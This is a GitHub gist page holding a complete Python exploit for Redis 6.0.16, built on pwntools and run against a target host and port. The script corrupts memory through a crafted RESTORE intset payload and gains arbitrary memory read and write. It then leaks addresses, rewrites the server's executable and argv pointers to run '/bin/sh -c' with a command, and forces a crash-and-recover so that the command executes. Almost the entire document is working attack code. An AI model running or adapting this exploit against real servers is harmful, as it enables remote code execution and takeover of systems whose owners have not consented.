Skip to content

Instantly share code, notes, and snippets.

@neex

neex/exploit.py Secret

Created January 14, 2023 19:05
Show Gist options
  • Save neex/57a81b6b916cde812a5d0586c5bb42ee to your computer and use it in GitHub Desktop.
Save neex/57a81b6b916cde812a5d0586c5bb42ee to your computer and use it in GitHub Desktop.
exploit for redis 6.0.16
from pwn import *
import argparse
PAYLOAD = "echo pwned | tee /tmp/pwned"
def crc64(data: bytes):
    """Return the 64-bit CRC of *data* as an int.

    The register is updated one bit at a time, consuming each input byte
    least-significant bit first, with polynomial 0xad93d23594c935a9 and an
    initial value of zero. The final register is bit-reversed before it is
    returned.
    """
    poly = 0xad93d23594c935a9
    top_bit = 1 << 63
    mask = (1 << 64) - 1

    reg = 0
    for byte in data:
        for shift in range(8):
            # Feedback is the register's top bit XOR the next input bit.
            feedback = bool(reg & top_bit) != bool((byte >> shift) & 1)
            reg = (reg << 1) & mask
            if feedback:
                reg ^= poly

    # Reflect all 64 bits: bit i of the register becomes bit 63 - i.
    return int(f"{reg:064b}"[::-1], 2)
def serialize(args):
    """Encode *args* as one RESP array of bulk strings and return the bytes.

    Each element may be an int (sent as its decimal text), a str (encoded
    with the default codec) or a bytes-like object (sent unchanged).
    """
    def as_bytes(item):
        # ints become their decimal text first, then share the str path.
        if isinstance(item, int):
            item = str(item)
        if isinstance(item, str):
            item = item.encode()
        return item

    chunks = [b"*%d\r\n" % len(args)]
    for raw in map(as_bytes, args):
        chunks += (b"$%d\r\n" % len(raw), raw, b"\r\n")
    return b"".join(chunks)
def read_reply(r):
    """Read one RESP reply from *r* and return it decoded.

    *r* must provide ``recvline()`` and ``recvn(n)``.

    Returns:
        ``(True, line)`` for a ``+`` status line and ``(False, line)`` for a
        ``-`` error line, where *line* is the raw header including its line
        ending; an ``int`` for ``:``; ``bytes`` (or ``None`` for length -1)
        for ``$``; a list of recursively decoded replies (or ``None`` for
        count -1) for ``*``.

    Raises:
        ValueError: if the header line starts with any other byte.
    """
    header = r.recvline()
    marker = header[:1]
    rest = header[1:].strip()

    if marker in (b"+", b"-"):
        return marker == b"+", header

    if marker == b":":
        return int(rest.decode())

    if marker == b"*":
        n_items = int(rest)
        if n_items == -1:
            return None
        return [read_reply(r) for _ in range(n_items)]

    if marker == b"$":
        size = int(rest)
        if size == -1:
            return None
        payload = r.recvn(size)
        r.recvn(2)  # discard the trailing \r\n
        return payload

    raise ValueError(f"Unexpected reply: {header}")
# Number of commands already sent whose replies have not been read yet.
buffered_reply_count = 0


def send_no_reply(r, args):
    """Send the command *args* on *r* without reading its reply.

    The reply stays unread on the connection; the module-level
    ``buffered_reply_count`` is incremented so a later reader knows how many
    replies are pending.
    """
    global buffered_reply_count
    request = serialize(args)
    r.send(request)
    buffered_reply_count = buffered_reply_count + 1
def send(r, args):
    """Send the command *args* on *r* and return its decoded reply.

    Replies still pending from earlier ``send_no_reply`` calls are read and
    discarded first, so the value returned belongs to this command.
    """
    global buffered_reply_count
    r.send(serialize(args))

    # Drain the replies of previously pipelined commands.
    pending = buffered_reply_count
    while pending > 0:
        read_reply(r)
        pending -= 1
    buffered_reply_count = 0

    return read_reply(r)
def get_buffered_replies(r, count=-1):
    """Read every pending pipelined reply from *r* and return them as a list.

    Args:
        r: connection passed through to ``read_reply``.
        count: when non-negative, return only the last *count* replies;
            when negative (the default), return all of them.

    Returns:
        The decoded replies in the order they were received.

    Raises:
        ValueError: if *count* is non-negative and fewer than *count*
            replies were pending.
    """
    global buffered_reply_count
    replies = [read_reply(r) for _ in range(buffered_reply_count)]
    buffered_reply_count = 0
    if count >= 0:
        if len(replies) < count:
            raise ValueError(f"Expected {count} replies, got {len(replies)}")
        # Slice from an explicit start index: ``replies[-count:]`` would be
        # ``replies[0:]`` for count == 0 and return everything, not nothing.
        replies = replies[len(replies) - count:]
    return replies
def add_checksum(data):
    """Return *data* followed by a two-byte trailer and its CRC-64.

    The bytes ``09 00`` are appended first (presumably a little-endian
    format version field; confirm against the consumer of this payload),
    then the ``crc64`` of everything so far as 8 little-endian bytes.
    """
    versioned = data + b"\x09\x00"
    checksum = crc64(versioned).to_bytes(8, "little")
    return b"".join((versioned, checksum))
def gen_length_payload(l):
    """Encode the length *l* as a 0x80 marker byte plus a 32-bit big-endian int.

    Raises ``struct.error`` if *l* does not fit in an unsigned 32-bit value.
    """
    marker = b"\x80"  # 32 bit length
    return marker + struct.pack(">I", l)
def gen_string_payload(data):
    """Return *data* prefixed with its length as encoded by ``gen_length_payload``."""
    return gen_length_payload(len(data)) + data
def get_rand_key(prefix, length=30):
    """Return a random alphanumeric key exactly *length* characters long.

    A non-empty *prefix* is kept at the start of the key, followed by ``#``;
    the remainder is filled with random ASCII letters and digits. The
    prefix (including the ``#``) must leave more than 8 characters of
    random padding, otherwise the assertion fails.
    """
    if prefix:
        prefix = prefix + '#'
    assert len(prefix) < length - 8

    alphabet = string.ascii_letters + string.digits
    padding = [random.choice(alphabet) for _ in range(length - len(prefix))]
    return prefix + ''.join(padding)
def is_redis_binary_address(addr):
return 0x550000000000 < addr < 0x570000000000
def is_jemalloc_heap_addr(addr):
return 0x7e0000000000 < addr < 0x800000000000
def gen_intset_payload():
buf = []
buf.append(b"\x0b") # intset
s = []
s.append(b"\x04\x00\x00\x00") # INTSET_ENC_INT32
s.append(b"\x00\x01\x00\x00")
s.append(
b"\x00\x00\x00\x80" * 60,
)
buf.append(gen_string_payload(b"".join(s)))
return b"".join(buf)
current_elda_addr = None
elda_size_cache = {}
def setup_elda_memview_once(addr, ignore_cache=False):
global elda_key, elda_offset, memview_key, current_elda_addr, elda_size_cache
if (ignore_cache and addr != current_elda_addr) or addr not in elda_size_cache:
send_no_reply(r, ["SETRANGE", memview_key, elda_offset - 8 - 3, struct.pack("<Q", addr)])
current_elda_addr = addr
if addr not in elda_size_cache:
l = send(r, ["STRLEN", elda_key])
elda_size_cache[addr] = l
return elda_size_cache[addr]
def setup_elda_memview(addr, size, limit_tries=-1):
global elda_size_cache
good_offset = None
print(f"Searching for offset to view {addr:x}-{addr + size:x}")
for candidate_addr in elda_size_cache:
if candidate_addr <= addr and \
candidate_addr + elda_size_cache[candidate_addr] >= addr + size:
good_offset = addr - candidate_addr
print(f"Found cached {candidate_addr:x}-{candidate_addr + elda_size_cache[candidate_addr]:x} for {addr:x}-{addr + size:x}")
break
if good_offset is None:
offset = 0
while True:
if limit_tries == 0:
print(f"Failed to find offset to view {addr:x}-{addr + size:x}")
return None
limit_tries -= 1
l = setup_elda_memview_once(addr - offset)
print(f"Trying {addr - offset:x}-{addr - offset + l:x}")
if l >= size + offset:
good_offset = offset
break
offset += 1
setup_elda_memview_once(addr - good_offset, ignore_cache=True)
return good_offset
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Redis exploit")
parser.add_argument("host", type=str, help="Redis host")
parser.add_argument("port", type=int, help="Redis port")
args = parser.parse_args()
r = remote(args.host, args.port)
send_no_reply(r, ["flushdb"])
send_no_reply(r, ["multi"])
el_count = 0x10
for i in range(el_count):
ending = f"yaitsa{i}".encode() + b"\xff" * 14 + b"\7f" + b"\xff"
send_no_reply(r, ["setrange", f"pizda{i}", 252 - len(ending), ending])
send_no_reply(r, ["setrange", f"pizda{i}", 0, b"\xff\xff\x7f\x04" + f"golovka{i}".encode()])
if i == el_count // 2:
send_no_reply(r, ["RESTORE", "hueset", "0", add_checksum(gen_intset_payload())])
send_no_reply(r, ["exec"])
members = send(r, ["SMEMBERS", "hueset"])
data = b''.join(struct.pack("<i", int(m.decode())) for m in members)
key_idx = el_count // 2 + 2
assert f"golovka{key_idx}".encode() in data
send_no_reply(r, ["SREM", "hueset", -2 ** 31])
memview_key = f"pizda{key_idx}"
memview_length = send(r, ["strlen", memview_key])
print(f"Memview length is {memview_length}")
assert memview_length > 2 ** 32
keys = send(r, ["keys", "*"])
for k in keys:
if k != memview_key.encode():
send_no_reply(r, ["del", k])
candidate_count = 10000
send_no_reply(r, ["EVAL", f'for i = 0, {candidate_count}, 1 do '
' redis.call("set", "elda" .. i, "0.123456789123456789");'
' redis.call("incrbyfloat", "elda" .. i, i + 1); '
'end', "0", "0"])
position = 0
step = 0x10000
elda_id, elda_offset = None, None
some_binary_address = None
while True:
portion = send(r, ["getrange", memview_key, position, position + step])
print(f"Searching for elda: {position} - {position + step}")
start_pos = position
position += step - 100
portion += b"\x00"
for index in range(len(portion)):
if elda_id is not None:
break
candidate_elda_id = 0
pp = index
while ord('0') <= portion[pp] <= ord('9'):
candidate_elda_id = candidate_elda_id * 10 + (portion[pp] - ord('0'))
pp += 1
if candidate_elda_id <= 0 or portion[pp:pp + 7] != b".123456":
continue
elda_id = candidate_elda_id - 1
elda_offset = start_pos + index
print(f"Found elda id {elda_id} at {elda_offset} offset: {portion[index:index + 20]}")
for index in range(len(portion)):
if some_binary_address is not None:
break
candidate = portion[index:index + 8]
candidate_addr = struct.unpack("<Q", candidate)[0]
if is_redis_binary_address(candidate_addr) and \
candidate_addr & 0xffffff != 4:
some_binary_address = candidate_addr
print(f"Found binary address: {hex(candidate_addr)}")
if elda_id is not None and some_binary_address is not None:
break
assert elda_id is not None
elda_key = f"elda{elda_id}"
old_value = send(r, ["get", elda_key])
print(f"Old value is {old_value}")
send(r, ["setrange", memview_key, elda_offset, b"pizda"])
new_value = send(r, ["get", elda_key])
print(f"New value is {new_value}")
assert new_value != old_value, "Value is not changed"
robj_offset = elda_offset - 19
robj = send(r, ["getrange", memview_key, robj_offset, robj_offset + 0x100])
print(f"Robj is {robj}")
send(r, ["setrange", memview_key, robj_offset, b"\x00"])
elda_addr = struct.unpack("<Q", robj[8:16])[0]
print(f"Elda address is {elda_addr:x}")
memview_addr = elda_addr - elda_offset
print(f"Memview address is {memview_addr:x}")
assert setup_elda_memview_once(memview_addr, ignore_cache=True) == memview_length
print(f"Some binary address is {some_binary_address:x}")
print(f"Searching for server struct")
search_addr = some_binary_address
server_struct = None
server_struct_search_step = 0x10000
while True:
this_start = search_addr
search_addr += server_struct_search_step - 100
offset = setup_elda_memview(this_start, server_struct_search_step)
data = send(r, ["getrange", elda_key, offset, offset + server_struct_search_step])
for i in range(len(data)):
server_struct_contents = data[i:i + 40]
if len(server_struct_contents) < 40:
continue
config, executable, argv, junk1, junk2 = struct.unpack("<QQQQQ", server_struct_contents)
if (is_jemalloc_heap_addr(config) or config == 0) and\
is_jemalloc_heap_addr(executable) and\
is_jemalloc_heap_addr(argv) and \
not is_jemalloc_heap_addr(junk1) and \
not is_jemalloc_heap_addr(junk2):
server_struct_candidate = this_start + i
print(f"Server struct may be at {server_struct_candidate:x}")
executable_offset = setup_elda_memview(executable, 0x30, limit_tries=200)
if executable_offset is None:
print(f"Memview for the executable addr {executable:x} is not found")
continue
executable_data = send(r, ["getrange", elda_key, executable_offset, executable_offset + 0x30])
print(f"Executable data is {executable_data}")
if not b"/redis-server" in executable_data:
continue
server_struct = server_struct_candidate
print(f"Found server struct at {server_struct:x}")
break
if server_struct is not None:
break
print(f"Found server struct at {server_struct:x}")
additional_args = ["/bin/sh",
"-c",
PAYLOAD]
arg_param_data = bytearray(b'\x00' * ((len(additional_args) + 1) * 8))
additional_arg_offsets = []
for a in additional_args:
additional_arg_offsets.append(len(arg_param_data))
arg_param_data.extend(a.encode() + b'\x00')
arg_param_data = bytes(arg_param_data)
print("Additional arg offsets:", additional_arg_offsets)
arg_key = get_rand_key("fake_args", 32)
send_no_reply(r, ["SET", arg_key, arg_param_data])
_, debug_info = send(r, ["DEBUG", "OBJECT", arg_key])
print(f"Debug info: {debug_info}")
value_at_addr = int(debug_info.split(b' ')[1].split(b':')[1].decode()[2:], 16)
print(f"Value at addr: {value_at_addr=:x}")
real_string_offset = setup_elda_memview(value_at_addr + 8, 8)
real_string_addr_data = send(r, ["getrange", elda_key, real_string_offset, real_string_offset + 7])
print(f"Real string addr data: {real_string_addr_data}")
real_string_addr = struct.unpack("<Q", real_string_addr_data)[0]
print(f"Real string addr: {real_string_addr=:x}")
for i, offset in enumerate(additional_arg_offsets):
send_no_reply(r, ["SETRANGE", arg_key, i * 8, struct.pack("<Q", real_string_addr + offset)])
server_offset = setup_elda_memview(server_struct, 0x30)
assert send(r, ["PING"])[0] is True, "ping failed"
send(r, ["SETRANGE", elda_key, server_offset + 8, struct.pack("<Q", real_string_addr + additional_arg_offsets[0])])
send(r, ["SETRANGE", elda_key, server_offset + 16, struct.pack("<Q", real_string_addr)])
assert send(r, ["PING"])[0] is True, "pre-restart ping failed"
print("Restarting server, cross fingers...")
send_no_reply(r, ["debug", "crash-and-recover"])
r.close()
print("The attack should have worked")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment